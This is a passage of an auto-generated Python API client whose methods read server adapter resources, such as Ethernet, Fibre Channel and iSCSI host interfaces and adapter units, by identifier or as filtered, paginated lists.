if 'expand' in local_var_params and local_var_params[
'expand'] is not None: # noqa: E501
query_params.append(
('$expand', local_var_params['expand'])) # noqa: E501
if 'apply' in local_var_params and local_var_params[
'apply'] is not None: # noqa: E501
query_params.append(
('$apply', local_var_params['apply'])) # noqa: E501
if 'count' in local_var_params and local_var_params[
'count'] is not None: # noqa: E501
query_params.append(
('$count', local_var_params['count'])) # noqa: E501
if 'inlinecount' in local_var_params and local_var_params[
'inlinecount'] is not None: # noqa: E501
query_params.append(
('$inlinecount',
local_var_params['inlinecount'])) # noqa: E501
if 'at' in local_var_params and local_var_params[
'at'] is not None: # noqa: E501
query_params.append(('at', local_var_params['at'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([
'application/json', 'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
]) # noqa: E501
# Authentication setting
auth_settings = ['cookieAuth', 'oAuth2'] # noqa: E501
return self.api_client.call_api(
'/adapter/HostEthInterfaces',
'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AdapterHostEthInterfaceList', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get(
'_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_adapter_host_fc_interface_by_moid(self, moid,
**kwargs): # noqa: E501
"""Read a 'adapter.HostFcInterface' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_adapter_host_fc_interface_by_moid(moid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: AdapterHostFcInterface
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_adapter_host_fc_interface_by_moid_with_http_info(
moid, **kwargs) # noqa: E501
def get_adapter_host_fc_interface_by_moid_with_http_info(
self, moid, **kwargs): # noqa: E501
"""Read a 'adapter.HostFcInterface' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_adapter_host_fc_interface_by_moid_with_http_info(moid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(AdapterHostFcInterface, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['moid'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_adapter_host_fc_interface_by_moid" % key)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'moid' is set
if self.api_client.client_side_validation and (
'moid' not in local_var_params or # noqa: E501
local_var_params['moid'] is None): # noqa: E501
raise ApiValueError(
"Missing the required parameter `moid` when calling `get_adapter_host_fc_interface_by_moid`"
) # noqa: E501
collection_formats = {}
path_params = {}
if 'moid' in local_var_params:
path_params['Moid'] = local_var_params['moid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([
'application/json', 'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
]) # noqa: E501
# Authentication setting
auth_settings = ['cookieAuth', 'oAuth2'] # noqa: E501
return self.api_client.call_api(
'/adapter/HostFcInterfaces/{Moid}',
'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AdapterHostFcInterface', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get(
'_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_adapter_host_fc_interface_list(self, **kwargs): # noqa: E501
"""Read a 'adapter.HostFcInterface' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_adapter_host_fc_interface_list(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str filter: Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).
:param str orderby: Determines what properties are used to sort the collection of resources.
:param int top: Specifies the maximum number of resources to return in the response.
:param int skip: Specifies the number of resources to skip in the response.
:param str select: Specifies a subset of properties to return.
:param str expand: Specify additional attributes or related resources to return in addition to the primary resources.
:param str apply: Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.
:param bool count: The $count query specifies the service should return the count of the matching resources, instead of returning the resources.
:param str inlinecount: The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.
:param str at: Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: AdapterHostFcInterfaceList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_adapter_host_fc_interface_list_with_http_info(
**kwargs) # noqa: E501
def get_adapter_host_fc_interface_list_with_http_info(
self, **kwargs): # noqa: E501
"""Read a 'adapter.HostFcInterface' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_adapter_host_fc_interface_list_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str filter: Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).
:param str orderby: Determines what properties are used to sort the collection of resources.
:param int top: Specifies the maximum number of resources to return in the response.
:param int skip: Specifies the number of resources to skip in the response.
:param str select: Specifies a subset of properties to return.
:param str expand: Specify additional attributes or related resources to return in addition to the primary resources.
:param str apply: Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.
:param bool count: The $count query specifies the service should return the count of the matching resources, instead of returning the resources.
:param str inlinecount: The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.
:param str at: Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(AdapterHostFcInterfaceList, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'filter', 'orderby', 'top', 'skip', 'select', 'expand', 'apply',
'count', 'inlinecount', 'at'
] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_adapter_host_fc_interface_list" % key)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'filter' in local_var_params and local_var_params[
'filter'] is not None: # noqa: E501
query_params.append(
('$filter', local_var_params['filter'])) # noqa: E501
if 'orderby' in local_var_params and local_var_params[
'orderby'] is not None: # noqa: E501
query_params.append(
('$orderby', local_var_params['orderby'])) # noqa: E501
if 'top' in local_var_params and local_var_params[
'top'] is not None: # noqa: E501
query_params.append(
('$top', local_var_params['top'])) # noqa: E501
if 'skip' in local_var_params and local_var_params[
'skip'] is not None: # noqa: E501
query_params.append(
('$skip', local_var_params['skip'])) # noqa: E501
if 'select' in local_var_params and local_var_params[
'select'] is not None: # noqa: E501
query_params.append(
('$select', local_var_params['select'])) # noqa: E501
if 'expand' in local_var_params and local_var_params[
'expand'] is not None: # noqa: E501
query_params.append(
('$expand', local_var_params['expand'])) # noqa: E501
if 'apply' in local_var_params and local_var_params[
'apply'] is not None: # noqa: E501
query_params.append(
('$apply', local_var_params['apply'])) # noqa: E501
if 'count' in local_var_params and local_var_params[
'count'] is not None: # noqa: E501
query_params.append(
('$count', local_var_params['count'])) # noqa: E501
if 'inlinecount' in local_var_params and local_var_params[
'inlinecount'] is not None: # noqa: E501
query_params.append(
('$inlinecount',
local_var_params['inlinecount'])) # noqa: E501
if 'at' in local_var_params and local_var_params[
'at'] is not None: # noqa: E501
query_params.append(('at', local_var_params['at'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([
'application/json', 'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
]) # noqa: E501
# Authentication setting
auth_settings = ['cookieAuth', 'oAuth2'] # noqa: E501
return self.api_client.call_api(
'/adapter/HostFcInterfaces',
'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AdapterHostFcInterfaceList', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get(
'_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_adapter_host_iscsi_interface_by_moid(self, moid,
**kwargs): # noqa: E501
"""Read a 'adapter.HostIscsiInterface' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_adapter_host_iscsi_interface_by_moid(moid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: AdapterHostIscsiInterface
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_adapter_host_iscsi_interface_by_moid_with_http_info(
moid, **kwargs) # noqa: E501
def get_adapter_host_iscsi_interface_by_moid_with_http_info(
self, moid, **kwargs): # noqa: E501
"""Read a 'adapter.HostIscsiInterface' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_adapter_host_iscsi_interface_by_moid_with_http_info(moid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(AdapterHostIscsiInterface, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['moid'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_adapter_host_iscsi_interface_by_moid" %
key)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'moid' is set
if self.api_client.client_side_validation and (
'moid' not in local_var_params or # noqa: E501
local_var_params['moid'] is None): # noqa: E501
raise ApiValueError(
"Missing the required parameter `moid` when calling `get_adapter_host_iscsi_interface_by_moid`"
) # noqa: E501
collection_formats = {}
path_params = {}
if 'moid' in local_var_params:
path_params['Moid'] = local_var_params['moid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([
'application/json', 'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
]) # noqa: E501
# Authentication setting
auth_settings = ['cookieAuth', 'oAuth2'] # noqa: E501
return self.api_client.call_api(
'/adapter/HostIscsiInterfaces/{Moid}',
'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AdapterHostIscsiInterface', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get(
'_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_adapter_host_iscsi_interface_list(self, **kwargs): # noqa: E501
"""Read a 'adapter.HostIscsiInterface' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_adapter_host_iscsi_interface_list(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str filter: Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).
:param str orderby: Determines what properties are used to sort the collection of resources.
:param int top: Specifies the maximum number of resources to return in the response.
:param int skip: Specifies the number of resources to skip in the response.
:param str select: Specifies a subset of properties to return.
:param str expand: Specify additional attributes or related resources to return in addition to the primary resources.
:param str apply: Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.
:param bool count: The $count query specifies the service should return the count of the matching resources, instead of returning the resources.
:param str inlinecount: The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.
:param str at: Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: AdapterHostIscsiInterfaceList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_adapter_host_iscsi_interface_list_with_http_info(
**kwargs) # noqa: E501
def get_adapter_host_iscsi_interface_list_with_http_info(
self, **kwargs): # noqa: E501
"""Read a 'adapter.HostIscsiInterface' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_adapter_host_iscsi_interface_list_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str filter: Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).
:param str orderby: Determines what properties are used to sort the collection of resources.
:param int top: Specifies the maximum number of resources to return in the response.
:param int skip: Specifies the number of resources to skip in the response.
:param str select: Specifies a subset of properties to return.
:param str expand: Specify additional attributes or related resources to return in addition to the primary resources.
:param str apply: Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.
:param bool count: The $count query specifies the service should return the count of the matching resources, instead of returning the resources.
:param str inlinecount: The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.
:param str at: Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(AdapterHostIscsiInterfaceList, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'filter', 'orderby', 'top', 'skip', 'select', 'expand', 'apply',
'count', 'inlinecount', 'at'
] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_adapter_host_iscsi_interface_list" % key)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'filter' in local_var_params and local_var_params[
'filter'] is not None: # noqa: E501
query_params.append(
('$filter', local_var_params['filter'])) # noqa: E501
if 'orderby' in local_var_params and local_var_params[
'orderby'] is not None: # noqa: E501
query_params.append(
('$orderby', local_var_params['orderby'])) # noqa: E501
if 'top' in local_var_params and local_var_params[
'top'] is not None: # noqa: E501
query_params.append(
('$top', local_var_params['top'])) # noqa: E501
if 'skip' in local_var_params and local_var_params[
'skip'] is not None: # noqa: E501
query_params.append(
('$skip', local_var_params['skip'])) # noqa: E501
if 'select' in local_var_params and local_var_params[
'select'] is not None: # noqa: E501
query_params.append(
('$select', local_var_params['select'])) # noqa: E501
if 'expand' in local_var_params and local_var_params[
'expand'] is not None: # noqa: E501
query_params.append(
('$expand', local_var_params['expand'])) # noqa: E501
if 'apply' in local_var_params and local_var_params[
'apply'] is not None: # noqa: E501
query_params.append(
('$apply', local_var_params['apply'])) # noqa: E501
if 'count' in local_var_params and local_var_params[
'count'] is not None: # noqa: E501
query_params.append(
('$count', local_var_params['count'])) # noqa: E501
if 'inlinecount' in local_var_params and local_var_params[
'inlinecount'] is not None: # noqa: E501
query_params.append(
('$inlinecount',
local_var_params['inlinecount'])) # noqa: E501
if 'at' in local_var_params and local_var_params[
'at'] is not None: # noqa: E501
query_params.append(('at', local_var_params['at'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([
'application/json', 'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
]) # noqa: E501
# Authentication setting
auth_settings = ['cookieAuth', 'oAuth2'] # noqa: E501
return self.api_client.call_api(
'/adapter/HostIscsiInterfaces',
'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AdapterHostIscsiInterfaceList', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get(
'_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_adapter_unit_by_moid(self, moid, **kwargs): # noqa: E501
"""Read a 'adapter.Unit' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_adapter_unit_by_moid(moid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: AdapterUnit
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_adapter_unit_by_moid_with_http_info(
moid, **kwargs) # noqa: E501
def get_adapter_unit_by_moid_with_http_info(self, moid,
**kwargs): # noqa: E501
"""Read a 'adapter.Unit' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_adapter_unit_by_moid_with_http_info(moid, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str moid: The unique Moid identifier of a resource instance. (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(AdapterUnit, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['moid'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError("Got an unexpected keyword argument '%s'"
" to method get_adapter_unit_by_moid" % key)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'moid' is set
if self.api_client.client_side_validation and (
'moid' not in local_var_params or # noqa: E501
local_var_params['moid'] is None): # noqa: E501
raise ApiValueError(
"Missing the required parameter `moid` when calling `get_adapter_unit_by_moid`"
) # noqa: E501
collection_formats = {}
path_params = {}
if 'moid' in local_var_params:
path_params['Moid'] = local_var_params['moid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept([
'application/json', 'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
]) # noqa: E501
# Authentication setting
auth_settings = ['cookieAuth', 'oAuth2'] # noqa: E501
return self.api_client.call_api(
'/adapter/Units/{Moid}',
'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AdapterUnit', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get(
'_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_adapter_unit_list(self, **kwargs): # noqa: E501
"""Read a 'adapter.Unit' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_adapter_unit_list(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str filter: Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).
:param str orderby: Determines what properties are used to sort the collection of resources.
:param int top: Specifies the maximum number of resources to return in the response.
:param int skip: Specifies the number of resources to skip in the response.
:param str select: Specifies a subset of properties to return.
:param str expand: Specify additional attributes or related resources to return in addition to the primary resources.
:param str apply: Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.
:param bool count: The $count query specifies the service should return the count of the matching resources, instead of returning the resources.
:param str inlinecount: The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.
:param str at: Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: AdapterUnitList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_adapter_unit_list_with_http_info(**
kwargs) # noqa: E501
def get_adapter_unit_list_with_http_info(self, **kwargs): # noqa: E501
"""Read a 'adapter.Unit' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_adapter_unit_list_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str filter: Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).
:param str orderby: Determines what properties are used to sort the collection of resources.
:param int top: Specifies the maximum number of resources to return in the response.
